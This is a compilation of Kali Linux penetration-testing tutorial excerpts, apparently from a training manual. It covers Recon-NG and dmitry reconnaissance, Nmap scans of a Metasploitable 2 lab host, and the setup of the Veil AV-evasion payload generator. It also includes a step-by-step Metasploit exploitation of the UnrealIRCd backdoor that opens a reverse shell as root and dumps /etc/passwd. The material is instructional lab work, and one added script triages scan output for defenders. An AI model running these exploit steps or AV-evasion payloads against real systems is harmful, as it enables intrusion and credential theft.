  • Kali Linux penetration-testing workflow

    2018-06-03 14:09:10
    A detailed flowchart of the Kali Linux penetration-testing process, provided as an XMind file that can be edited.
  • Kali Linux Penetration Testing Tutorial: The Recon-NG Framework

    2015-08-28 14:16:30

    Information Gathering

    Information gathering is one of the most important phases of a network attack. Before a penetration attack can be carried out, information of every kind must be collected about the target; the more information is gathered, the higher the probability that the attack succeeds. This chapter introduces the tools used for information gathering.

    The Recon-NG Framework

    Recon-NG is an open-source web reconnaissance (information-gathering) framework written in Python. It is a powerful tool that automates information collection and network reconnaissance. The following describes how to use the Recon-NG reconnaissance tool.

    Start the Recon-NG framework with the following command:

        root@kali:~# recon-ng

            _/_/_/    _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/
           _/    _/  _/        _/        _/      _/  _/_/    _/            _/_/    _/  _/
          _/_/_/    _/_/_/    _/        _/      _/  _/  _/  _/  _/_/_/_/  _/  _/  _/  _/  _/_/_/
         _/    _/  _/        _/        _/      _/  _/    _/_/            _/    _/_/  _/      _/
        _/    _/  _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/

             +---------------------------------------------------------------------------+
             |  _                     ___    _                        __                 |
             | |_)| _  _|_  |_|.|| _   |  _ |_ _  _ _  _ _|_o _  _   (_  _  _    _o_|_   |
             | |_)|(_|(_|\  | ||||_\  _|_| || (_)| |||(_| | |(_)| |  __)(/_(_|_|| | | \/ |
             |                                                                        /  |
             |              Consulting | Research | Development | Training               |
             |                     http://www.blackhillsinfosec.com                      |
             +---------------------------------------------------------------------------+

                              [recon-ng v4.1.4, Tim Tomes (@LaNMaSteR53)]

        [56] Recon modules
        [5]  Reporting modules
        [2]  Exploitation modules
        [2]  Discovery modules
        [1]  Import modules

        [recon-ng][default] >

    The output above shows basic information about the Recon-NG framework: it contains 56 recon modules, 5 reporting modules, 2 exploitation modules, 2 discovery modules and 1 import module. The [recon-ng][default] > prompt indicates that the framework has started successfully; commands can now be entered at this prompt.

    Before using Recon-NG for the first time, run the help command to list all available commands:

        [recon-ng][default] > help

        Commands (type [help|?] <topic>):
        ---------------------------------
        add             Adds records to the database
        back            Exits current prompt level
        del             Deletes records from the database
        exit            Exits current prompt level
        help            Displays this menu
        keys            Manages framework API keys
        load            Loads specified module
        pdb             Starts a Python Debugger session
        query           Queries the database
        record          Records commands to a resource file
        reload          Reloads all modules
        resource        Executes commands from a resource file
        search          Searches available modules
        set             Sets module options
        shell           Executes shell commands
        show            Shows various framework items
        spool           Spools output to a file
        unset           Unsets module options
        use             Loads specified module
        workspaces      Manages workspaces

    The output above lists the commands that can be run in the Recon-NG framework. The framework is similar to Metasploit and likewise supports many modules. Use show modules to list all available modules:

        [recon-ng][default] > show modules

          Discovery
          ---------
            discovery/info_disclosure/cache_snoop
            discovery/info_disclosure/interesting_files

          Exploitation
          ------------
            exploitation/injection/command_injector
            exploitation/injection/xpath_bruter

          Import
          ------
            import/csv_file

          Recon
          -----
            recon/companies-contacts/facebook
            recon/companies-contacts/jigsaw
            recon/companies-contacts/jigsaw/point_usage
            recon/companies-contacts/jigsaw/purchase_contact
            recon/companies-contacts/jigsaw/search_contacts
            recon/companies-contacts/linkedin_auth
            recon/contacts-contacts/mangle
            recon/contacts-contacts/namechk
            recon/contacts-contacts/rapportive
            recon/contacts-creds/haveibeenpwned
            ...
            recon/hosts-hosts/bing_ip
            recon/hosts-hosts/ip_neighbor
            recon/hosts-hosts/ipinfodb
            recon/hosts-hosts/resolve
            recon/hosts-hosts/reverse_resolve
            recon/locations-locations/geocode
            recon/locations-locations/reverse_geocode
            recon/locations-pushpins/flickr
            recon/locations-pushpins/picasa
            recon/locations-pushpins/shodan
            recon/locations-pushpins/twitter
            recon/locations-pushpins/youtube
            recon/netblocks-hosts/reverse_resolve
            recon/netblocks-hosts/shodan_net
            recon/netblocks-ports/census_2012

          Reporting
          ---------
            reporting/csv
            reporting/html
            reporting/list
            reporting/pushpin
            reporting/xml

        [recon-ng][default] >

    The output is divided into five sections; the number of modules in each section was shown when the framework started. The different modules can be used to gather various kinds of information.

    [Example 3-1] Use the recon/domains-hosts/baidu_site module to enumerate the subdomains of baidu.com. The steps are as follows:

    1) Load the recon/domains-hosts/baidu_site module:

        [recon-ng][default] > use recon/domains-hosts/baidu_site

    2) Show the configurable options of the module:

        [recon-ng][default][baidu_site] > show options

          Name    Current Value  Req  Description
          ------  -------------  ---  ----------------------------------------------
          SOURCE  default        yes  source of input (see 'show info' for details)

        [recon-ng][default][baidu_site] >

    The output shows that one option must be configured.

    3) Set the SOURCE option:

        [recon-ng][default][baidu_site] > set SOURCE baidu.com
        SOURCE => baidu.com

    The output shows that SOURCE is now set to baidu.com.

    4) Start the information collection:

        [recon-ng][default][baidu_site] > run

        ---------
        BAIDU.COM
        ---------
        [*] URL: http://www.baidu.com/s?pn=0&wd=site%3Abaidu.com
        [*] map.baidu.com
        [*] 123.baidu.com
        [*] jingyan.baidu.com
        [*] top.baidu.com
        [*] www.baidu.com
        [*] hi.baidu.com
        [*] video.baidu.com
        [*] pan.baidu.com
        [*] zhidao.baidu.com
        [*] Sleeping to avoid lockout...

        -------
        SUMMARY
        -------
        [*] 9 total (2 new) items found.

    The output shows that 9 subdomains were found. All enumerated data is stored in the database that Recon-NG maintains, and a report can now be generated to view the collected data.

    [Example 3-2] View the collected data. The steps are as follows:

    1) Select the reporting/csv module:

        [recon-ng][default] > use reporting/csv

    2) Generate the report:

        [recon-ng][default][csv] > run
        [*] 9 records added to '/root/.recon-ng/workspaces/default/results.csv'.

    The output shows that the 9 enumerated records were added to /root/.recon-ng/workspaces/default/results.csv. Opening that file gives the view shown in Figure 3.1.

    Figure 3.1  The results.csv file

    3) In this view, all the enumerated subdomains can be seen.

    The dmitry command can also be used to query information about a website. The following describes how to use it.

    Display the help for the dmitry command:

        root@kali:~# dmitry -h
        Deepmagic Information Gathering Tool
        "There be some deep magic going on"

        dmitry: invalid option -- 'h'
        Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
          -o     Save output to %host.txt or to file specified by -o file
          -i     Perform a whois lookup on the IP address of a host
          -w     Perform a whois lookup on the domain name of a host
          -n     Retrieve Netcraft.com information on a host
          -s     Perform a search for possible subdomains
          -e     Perform a search for possible email addresses
          -p     Perform a TCP port scan on a host
        * -f     Perform a TCP port scan on a host showing output reporting filtered ports
        * -b     Read in the banner received from the scanned port
        * -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
        *Requires the -p flagged to be passed

    The output above shows the syntax of the dmitry command and all of its options. Next, use the -s option to search for possible subdomains:

        root@kali:~# dmitry -s google.com
        Deepmagic Information Gathering Tool
        "There be some deep magic going on"

        HostIP:173.194.127.71
        HostName:google.com

        Gathered Subdomain information for google.com
        ---------------------------------
        Searching Google.com:80...
        HostName:www.google.com
        HostIP:173.194.127.51
        Searching Altavista.com:80...
        Found 1 possible subdomain(s) for host google.com, Searched 0 pages containing 0 results

        All scans completed, exiting

    The output shows that one subdomain was found: www.google.com, with IP address 173.194.127.51. By default the command searches through google.com; if google.com cannot be reached, running the command produces the error Unable to connect: Socket Connect Error.

    This article is excerpted from the internal training material "Kali Linux Penetration Testing Practical Manual" by 大学霸 (Daxueba). Please credit the source when reposting; respect technology and respect IT professionals.
  • Kali Linux Penetration Testing Tutorial: The Network Scanning and Sniffing Tool Nmap

    Network Scanning and Sniffing Tool: Nmap

    Nmap, the Network Mapper, is a free and open network scanning and sniffing tool. It can determine whether a host is online, which ports it has open, which network services it provides and what operating system it runs. This section introduces the use of Nmap. Before using the tool, you first need to know its scan types; the main ones are listed in Table 4-1.

    Table 4-1  Nmap scan types


    [Example 4-1] Scan the ports of the target host 192.168.6.105 with nmap:

        root@kali:~# nmap -sS -Pn 192.168.6.105

        Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-16 09:25 CST
        Nmap scan report for 192.168.6.105
        Host is up (0.00014s latency).
        Not shown: 977 closed ports
        PORT     STATE SERVICE
        21/tcp   open  ftp
        22/tcp   open  ssh
        23/tcp   open  telnet
        25/tcp   open  smtp
        53/tcp   open  domain
        80/tcp   open  http
        111/tcp  open  rpcbind
        139/tcp  open  netbios-ssn
        445/tcp  open  microsoft-ds
        512/tcp  open  exec
        513/tcp  open  login
        514/tcp  open  shell
        1099/tcp open  rmiregistry
        1524/tcp open  ingreslock
        2049/tcp open  nfs
        2121/tcp open  ccproxy-ftp
        3306/tcp open  mysql
        5432/tcp open  postgresql
        5900/tcp open  vnc
        6000/tcp open  X11
        6667/tcp open  irc
        8009/tcp open  ajp13
        8180/tcp open  unknown
        MAC Address: 00:0C:29:13:E0:3D (VMware)

        Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds

    The output above lists all open ports on the target host 192.168.6.105 together with host information such as its MAC address, and shows that the scan took 0.48 seconds. In the command, the -sS option selects a TCP SYN scan and the -Pn option skips the ping (host discovery) step. The TCP SYN scan is used here because it is very fast and less likely to be noticed by the target host.

    To see every running service on the target host along with its version, use Nmap's -A option.

    [Example 4-2] Scan all ports and service versions on the target host 192.168.6.105:

        root@kali:~# nmap -sS -Pn -A 192.168.6.105

        Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-16 09:25 CST
        Nmap scan report for 192.168.6.105
        Host is up (0.00035s latency).
        Not shown: 977 closed ports
        PORT     STATE SERVICE     VERSION
        21/tcp   open  ftp         vsftpd 2.3.4
        |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
        22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
        | ssh-hostkey:
        |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
        |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
        23/tcp   open  telnet      Linux telnetd
        25/tcp   open  smtp        Postfix smtpd
        |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
        | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
        | Not valid before: 2010-03-17T14:07:45+00:00
        |_Not valid after:  2010-04-16T14:07:45+00:00
        |_ssl-date: 2014-07-09T06:59:06+00:00; -6d18h27m07s from local time.
        53/tcp   open  domain      ISC BIND 9.4.2
        | dns-nsid:
        |_  bind.version: 9.4.2
        80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
        |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
        |_http-title: Metasploitable2 – Linux
        ...
        6667/tcp open  irc         Unreal ircd
        | irc-info:
        |   server: irc.Metasploitable.LAN
        |   version: Unreal3.2.8.1. irc.Metasploitable.LAN
        |   servers: 1
        |   users: 1
        |   lservers: 0
        |   lusers: 1
        |   uptime: 0 days, 20:28:27
        |   source host: 45DFBD5E.E9742FE6.FFFA6D49.IP
        |_  source ident: nmap
        8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
        |_ajp-methods: Failed to get a valid response for the OPTION request
        8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
        |_http-favicon: Apache Tomcat
        |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
        |_http-title: Apache Tomcat/5.5
        MAC Address: 00:0C:29:13:E0:3D (VMware)
        Device type: general purpose
        Running: Linux 2.6.X
        OS CPE: cpe:/o:linux:linux_kernel:2.6
        OS details: Linux 2.6.9 - 2.6.33
        Network Distance: 1 hop
        Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

        Host script results:
        |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
        | smb-os-discovery:
        |   OS: Unix (Samba 3.0.20-Debian)
        |   NetBIOS computer name:
        |   Workgroup: WORKGROUP
        |_  System time: 2014-07-09T02:59:06-04:00

        TRACEROUTE
        HOP RTT     ADDRESS
        1   0.35 ms 192.168.6.105

        OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
        Nmap done: 1 IP address (1 host up) scanned in 25.58 seconds

    The output shows the services running on the target host and their software versions, for example the Unreal Internet Relay Chat (IRC) service at version 3.8.1. Once a service's version is known, it can be used to attack the host; the following example shows how a host is attacked by way of a service version.
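    As an added defender-side example (not from the original tutorial), the following Python script parses a report in the format shown above and flags the services an administrator would want to remediate first: cleartext or legacy protocols, anonymous FTP, an exposed IRC daemon, and an end-of-life OpenSSH release. The embedded report is a constructed excerpt of the scan above, and the risk rules are this example's own, not Nmap's.

```python
"""Triage helper for normal-format Nmap service-scan output.

Added example, not part of the tutorial: parses 'PORT STATE SERVICE VERSION'
lines plus the NSE script lines ('|' / '|_') that follow each port, then
applies a small set of defender-oriented risk rules to the open services.
"""
import re
from dataclasses import dataclass, field

# Constructed sample, trimmed from the nmap -A output shown in the tutorial.
SAMPLE_REPORT = """\
Nmap scan report for 192.168.6.105
Host is up (0.00035s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
6667/tcp open  irc         Unreal ircd
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:13:E0:3D (VMware)
"""

# port/proto, state, service name, and an optional free-form version string
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")

# Services whose protocol itself is the problem (cleartext or legacy r-services).
CLEARTEXT = {"ftp", "telnet", "exec", "login", "shell", "pop3", "imap"}


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    scripts: list = field(default_factory=list)  # NSE script output lines


def parse_report(text: str) -> list:
    """Return the open services; NSE lines are attached to the preceding port."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version or ""))
        elif line.startswith("|") and services:
            services[-1].scripts.append(line.lstrip("|_ ").strip())
    return [s for s in services if s.state == "open"]


def triage(services) -> dict:
    """Map 'port/proto' to a list of findings; an empty list means nothing flagged."""
    findings = {}
    for s in services:
        notes = []
        if s.name in CLEARTEXT:
            notes.append("cleartext/legacy protocol; disable or replace with an encrypted equivalent")
        if any("Anonymous FTP login allowed" in sc for sc in s.scripts):
            notes.append("anonymous FTP enabled; restrict or remove")
        if s.name == "irc":
            notes.append("IRC daemon exposed; verify package integrity and whether it is needed")
        if s.version.startswith("OpenSSH 4."):
            notes.append("end-of-life OpenSSH release; upgrade")
        findings[f"{s.port}/{s.proto}"] = notes
    return findings


def high_risk_ports(text: str) -> list:
    """Sorted 'port/proto' keys with at least one finding, for a remediation list."""
    flagged = (k for k, v in triage(parse_report(text)).items() if v)
    return sorted(flagged, key=lambda k: int(k.split("/")[0]))


if __name__ == "__main__":
    for key, notes in triage(parse_report(SAMPLE_REPORT)).items():
        print(key, "->", "; ".join(notes) if notes else "no finding")
```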

    [Example 4-3] Exploit the Unreal IRC service from the MSF console. In this example the Metasploitable 2 system at 192.168.6.105 is the target. The steps are as follows:

    1) Start the MSF console:

        root@kali:~# msfconsole
        msf >

    After running the command, the msf > prompt shows that the MSF console has started successfully.

    2) Search for modules that can be used against Unreal 3.2.8.1:

        msf > search Unreal 3.2.8.1

        Matching Modules
        ================

           Name                                        Disclosure Date  Rank       Description
           ----                                        ---------------  ----       -----------
           exploit/linux/games/ut2004_secure           2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Linux)
           exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
           exploit/windows/games/ut2004_secure         2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Win32)

    The output shows three matching modules. This example uses unreal_ircd_3281_backdoor, which is ranked excellent.

    3) Show the detailed information for the unreal_ircd_3281_backdoor module:

        msf > info exploit/unix/irc/unreal_ircd_3281_backdoor

               Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
             Module: exploit/unix/irc/unreal_ircd_3281_backdoor
           Platform: Unix
         Privileged: No
            License: Metasploit Framework License (BSD)
               Rank: Excellent

        Provided by:
          hdm <hdm@metasploit.com>

        Available targets:
          Id  Name
          --  ----
          0   Automatic Target

        Basic options:
          Name   Current Setting  Required  Description
          ----   ---------------  --------  -----------
          RHOST                   yes       The target address
          RPORT  6667             yes       The target port

        Payload information:
          Space: 1024

        Description:
          This module exploits a malicious backdoor that was added to the
          Unreal IRCD 3.2.8.1 download archive. This backdoor was present in
          the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th
          2010.

        References:
          http://cvedetails.com/cve/2010-2075/
          http://www.osvdb.org/65445
          http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

    The output shows the details of the unreal_ircd_3281_backdoor module, including the supported platform, privilege requirement, author, basic options and description.

    4) Select the unreal_ircd_3281_backdoor module and show its configurable options:

        msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
        msf exploit(unreal_ircd_3281_backdoor) > show options

        Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

           Name   Current Setting  Required  Description
           ----   ---------------  --------  -----------
           RHOST                   yes       The target address
           RPORT  6667             yes       The target port

        Exploit target:

           Id  Name
           --  ----
           0   Automatic Target

    The output shows two required options. RPORT is already set; RHOST still needs to be configured.

    5) Set the RHOST option:

        msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.6.105
        RHOST => 192.168.6.105

    The output shows that the target host address is set to 192.168.6.105.

    6) List all usable payloads:

        msf exploit(unreal_ircd_3281_backdoor) > show payloads

        Compatible Payloads
        ===================

           Name                                Disclosure Date  Rank    Description
           ----                                ---------------  ----    -----------
           cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
           cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
           cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
           cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
           cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
           cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
           cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
           cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
           cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
           cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
           cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)

    The output lists the payloads that can be loaded with the unreal_ircd_3281_backdoor module. Their descriptions show that they are all command-line shells, so a Meterpreter shell cannot be obtained, and only a reverse shell can be used here. After a successful attack, the privileges available in the terminal shell are also reduced.

    7) Attack the target with a reverse shell. Load the reverse payload and show its configurable options:

        msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
        payload => cmd/unix/reverse
        msf exploit(unreal_ircd_3281_backdoor) > show options

        Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

           Name   Current Setting  Required  Description
           ----   ---------------  --------  -----------
           RHOST  192.168.6.105    yes       The target address
           RPORT  6667             yes       The target port

        Payload options (cmd/unix/reverse):

           Name   Current Setting  Required  Description
           ----   ---------------  --------  -----------
           LHOST                   yes       The listen address
           LPORT  4444             yes       The listen port

        Exploit target:

           Id  Name
           --  ----
           0   Automatic Target

    The output shows that the LHOST option is not yet set.

    8) Set the LHOST option:

        msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.6.103
        LHOST => 192.168.6.103

    After running the command, check the configuration of all options again:

        msf exploit(unreal_ircd_3281_backdoor) > show options

        Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

           Name   Current Setting  Required  Description
           ----   ---------------  --------  -----------
           RHOST  192.168.6.105    yes       The target address
           RPORT  6667             yes       The target port

        Payload options (cmd/unix/reverse):

           Name   Current Setting  Required  Description
           ----   ---------------  --------  -----------
           LHOST  192.168.6.103    yes       The listen address
           LPORT  4444             yes       The listen port

        Exploit target:

           Id  Name
           --  ----
           0   Automatic Target

    The output shows that all options are now configured, so the attack can be launched.

    9) Launch the exploit:

        msf exploit(unreal_ircd_3281_backdoor) > exploit

        [*] Started reverse double handler
        [*] Connected to 192.168.6.105:6667...
            :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
        [*] Sending backdoor command...
        [*] Accepted the first client connection...
        [*] Accepted the second client connection...
        [*] Command: echo 4G58mrIzlfNG2zIm;
        [*] Writing to socket A
        [*] Writing to socket B
        [*] Reading from sockets...
        [*] Reading from socket B
        [*] B: "4G58mrIzlfNG2zIm\r\n"
        [*] Matching...
        [*] A is input...
        [*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:53656) at 2014-07-16 09:34:05 +0800

    The output shows that a session was opened successfully. No shell prompt appears, only a blinking cursor; this means a terminal shell on the target host is connected and any standard Linux command can be run. For example, to show the user currently logged in on the target system:

        whoami

    The command outputs:

        root

    The output shows that the current user is the superuser root.

    To view the target system's password file:

        cat /etc/passwd
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/bin/sh
        bin:x:2:2:bin:/bin:/bin/sh
        sys:x:3:3:sys:/dev:/bin/sh
        sync:x:4:65534:sync:/bin:/bin/sync
        games:x:5:60:games:/usr/games:/bin/sh
        man:x:6:12:man:/var/cache/man:/bin/sh
        lp:x:7:7:lp:/var/spool/lpd:/bin/sh
        mail:x:8:8:mail:/var/mail:/bin/sh
        news:x:9:9:news:/var/spool/news:/bin/sh
        uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
        proxy:x:13:13:proxy:/bin:/bin/sh
        www-data:x:33:33:www-data:/var/www:/bin/sh
        backup:x:34:34:backup:/var/backups:/bin/sh
        list:x:38:38:Mailing List Manager:/var/list:/bin/sh
        irc:x:39:39:ircd:/var/run/ircd:/bin/sh
        gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
        nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
        libuuid:x:100:101::/var/lib/libuuid:/bin/sh
        dhcp:x:101:102::/nonexistent:/bin/false
        syslog:x:102:103::/home/syslog:/bin/false
        klog:x:103:104::/home/klog:/bin/false
        sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
        msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
        bind:x:105:113::/var/cache/bind:/bin/false
        postfix:x:106:115::/var/spool/postfix:/bin/false
        ftp:x:107:65534::/home/ftp:/bin/false
        postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
        mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
        tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
        distccd:x:111:65534::/:/bin/false
        user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
        service:x:1002:1002:,,,:/home/service:/bin/bash
        telnetd:x:112:120::/nonexistent:/bin/false
        proftpd:x:113:65534::/var/run/proftpd:/bin/false
        statd:x:114:65534::/var/lib/nfs:/bin/false
        snmp:x:115:65534::/var/lib/snmp:/bin/false

    The output shows all user accounts on the target system. This information can be used to attack the passwords of users on the target host.

    This article is excerpted from the internal training material "Kali Linux Penetration Testing Practical Manual" by 大学霸 (Daxueba). Please credit the source when reposting; respect technology and respect IT professionals.
  • Kali Linux Penetration Testing Tutorial: The AV-Evading Payload Generator Veil

    AV-Evading Payload Generator: Veil

    Veil is a tool that generates payloads compatible with the Metasploit framework that can bypass common antivirus software in most network environments. This section introduces the installation and use of Veil.

    Veil is not installed by default in Kali Linux, so install it first with the following command:

        root@kali:~# apt-get update && apt-get install veil

    If the installation completes without errors, Veil was installed successfully. Because the tool has many dependencies, this process takes some time.

    Start Veil:

        root@kali:~# veil-evasion

    The command prints a large amount of output, as shown below:

        =========================================================================
         Veil First Run Detected... Initializing Script Setup...
        =========================================================================

        [*] Executing ./setup/setup.sh

        =========================================================================
         Veil-Evasion Setup Script | [Updated]: 01.15.2015
        =========================================================================
         [Web]: https://www.veil-framework.com | [Twitter]: @VeilFramework
        =========================================================================

        [*] Initializing Apt Dependencies Installation
        [*] Adding i386 Architecture To x86_64 System
        [*] Updating Apt Package Lists
        命中 http://mirrors.ustc.edu.cn kali Release.gpg
        命中 http://mirrors.ustc.edu.cn kali/updates Release.gpg
        命中 http://mirrors.ustc.edu.cn kali Release
        命中 http://mirrors.ustc.edu.cn kali/updates Release
        命中 http://mirrors.ustc.edu.cn kali/main Sources
        命中 http://mirrors.ustc.edu.cn kali/non-free Sources
        命中 http://mirrors.ustc.edu.cn kali/contrib Sources
        命中 http://mirrors.ustc.edu.cn kali/main amd64 Packages
        命中 http://mirrors.ustc.edu.cn kali/non-free amd64 Packages
        命中 http://mirrors.ustc.edu.cn kali/contrib amd64 Packages
        获取:1 http://mirrors.ustc.edu.cn kali/main i386 Packages [8,474 kB]
        命中 http://http.kali.org kali Release.gpg
        命中 http://security.kali.org kali/updates Release.gpg
        命中 http://http.kali.org kali Release
        ...
        忽略 http://http.kali.org kali/non-free Translation-en
        下载 17.8 MB,耗时 20 (859 kB/s)
        正在读取软件包列表... 完成
         [*] Installing Wine i386 Binaries
        正在读取软件包列表... 完成
        正在分析软件包的依赖关系树
        正在读取状态信息... 完成
        将会安装下列额外的软件包:
          gcc-4.7-base:i386 libasound2:i386 libc-bin libc-dev-bin libc6 libc6:i386
          libc6-dev libc6-i686:i386 libdbus-1-3:i386 libdrm-intel1:i386
          libdrm-nouveau1a:i386 libdrm-radeon1:i386 libdrm2:i386 libexpat1:i386
          libffi5:i386 libfontconfig1:i386 libfreetype6:i386 libgcc1:i386
        [*] Cleaning Up Setup Files
        [*] Updating Veil-Framework Configuration

         Veil-Framework configuration:
         [*] OPERATING_SYSTEM = Kali
         [*] TERMINAL_CLEAR = clear
         [*] TEMP_DIR = /tmp/
         [*] MSFVENOM_OPTIONS =
         [*] METASPLOIT_PATH = /usr/share/metasploit-framework/
         [*] PYINSTALLER_PATH = /usr/share/pyinstaller/
         [*] VEIL_EVASION_PATH = /usr/share/veil-evasion/
         [*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/
         [*] Path '/root/veil-output/source/' Created
         [*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/
         [*] Path '/root/veil-output/compiled/' Created
         [*] Path '/root/veil-output/handlers/' Created
         [*] GENERATE_HANDLER_SCRIPT = True
         [*] HANDLER_PATH = /root/veil-output/handlers/
         [*] HASH_LIST = /root/veil-output/hashes.txt
         [*] VEIL_CATAPULT_PATH = /usr/share/Veil-Catapult/
         [*] Path '/root/veil-output/catapult/' Created
         [*] CATAPULT_RESOURCE_PATH = /root/veil-output/catapult/
         [*] Path '/etc/veil/' Created
         Configuration File Written To '/etc/veil/settings.py'

    The information above is shown only the first time Veil is run. During this first run it initializes scripts, updates package lists and the configuration, and installs the required packages. It also installs, through graphical installers, Python and two of its modules, pywin32-218 and pycrypto-2.6. These are installed in turn; the first dialog to appear is shown in Figure 4.1.

    This is the initial Python setup screen. Keep the default settings and click Next; the screen in Figure 4.2 appears.

    Figure 4.1  Python initial screen        Figure 4.2  Choose the Python install location

    Click Next on this screen and the screen in Figure 4.3 appears. It warns that C:\Python27 already exists and asks whether to overwrite the existing files. Click Yes; the screen in Figure 4.4 appears.

    Figure 4.3  Confirm the Python install location        Figure 4.4  Customize Python

    This screen lets you customize which Python features are installed. Keep the default settings and click Next; the screen in Figure 4.5 appears.

    Figure 4.5  Installation complete        Figure 4.6  pywin32-218 module setup screen

    This screen reports that Python has been installed. Click Finish; the screen in Figure 4.6 appears.

    This screen asks to install the pywin32-218 module. Click Next; the screen in Figure 4.7 appears.

    Figure 4.7  Setup wizard        Figure 4.8  Ready to install

    Keep the default settings and click Next; the screen in Figure 4.8 appears.

    This screen asks you to confirm that the installation should begin. If the settings are correct, click Next; the screen in Figure 4.9 appears.

    Figure 4.9  Installation complete        Figure 4.10  pycrypto-2.6 module initial screen

    This screen shows that the pywin32-218 module has been installed. Click Finish; the screen in Figure 4.10 appears.

    This screen asks to install the pycrypto-2.6 module. Click Next to start the installation, as shown in Figure 4.11.

    Figure 4.11  Setup wizard        Figure 4.12  Ready to install

    Keep the default settings and click Next; the screen in Figure 4.12 appears.

    This screen indicates that the pycrypto module is about to be installed. Click Next; the screen in Figure 4.13 appears.

    Figure 4.13  Installation complete

    This screen shows that the packages above have been installed. Click Finish, and the following information is displayed:

        =========================================================================
         Veil-Evasion | [Version]: 2.4.3
        =========================================================================
         [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
        =========================================================================

         Main Menu

                 24 payloads loaded

         Available commands:

                 use             use a specific payload
                 info            information on a specific payload
                 list            list available payloads
                 update          update Veil to the latest version
                 clean           clean out payload folders
                 checkvt         check payload hashes vs. VirusTotal
                 exit            exit Veil

         [>] Please enter a command:

    The information above shows that Veil has 24 payloads loaded and lists the available commands. Various operations can now be performed; for example, to list the loadable payload modules:

         [>] Please enter a command: list
        =========================================================================
